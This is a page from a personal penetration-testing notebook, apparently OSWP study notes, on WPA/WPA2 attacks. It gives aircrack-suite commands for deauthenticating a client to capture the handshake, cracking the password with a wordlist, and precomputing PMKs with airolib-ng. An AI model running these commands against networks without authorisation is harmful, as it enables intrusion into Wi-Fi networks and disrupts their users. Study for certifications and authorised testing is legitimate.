refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page
  • 1. De-authentication attack
  • 2. Aircrack-ng to discover WPA password
  • Airolib-ng - creating PMK database for faster cracking
  • Info: How WPA passwords are "cracked"?

Was this helpful?

WPA/WPA2 Attacks

Start airmon-ng and airodump-ng and output it to <airodump-output.cap>

1. De-authentication attack

Using de-auth attack knocks off the client from the wifi and when it attempts to be reconnected a 4-way handshake will be captured. This can be used by aircrack-ng to find the password by dictionary attack

aireplay-ng -0 1 -a <AP-mac-addr> -c <Victim-mac-addr> mon0

When client reconnects, you will see the top right of airodump-ng screen indicates that handshake is now captured.

If you use wireshark to check the contents of packets <output.cap>. Filter the contents of the cap file by using "EAPOL" and observe that the 4-way handshake is captured.

wireshark <output.cap>

2. Aircrack-ng to discover WPA password

aircrack-ng -0 -w <wordlist> <airodump-output.cap>

Airolib-ng - creating PMK database for faster cracking

# add my ESSD into a text fiole
echo WIFU > essid.txt

# create database of PMK
airolib-ng my_password_db --import essid essid.txt 

# shows 0 passwords
airolib-ng my_password_db --stats

# import password list to database
airolib-ng my_password_db --import passwd /usr/share/wordlists/myWordl.txt

# batch calculate PMK 
airolib-ng my_password_db --batch

Info: How WPA passwords are "cracked"?

There are 2 things needed to crack WPA password. (1) handshake (2) wordlist

In short, the Handshake is made up of the Password + the following "ingredients":

  • SP Address

  • STA Address

  • AP Nonce

  • STA Nonce

  • EAPOL

  • Payload

Which generates a MIC (Message integrity code). Now this value changes if the "ingredients" including the Password value changes.

To crack the Password, the attack is basically taking each word form the wordlists we provide and cook it with the "ingredients" to see if the MIC matches the one with the rightful password.

PreviousWEP Attack (SKA)Nextget port from nmap

Last updated 4 years ago

Was this helpful?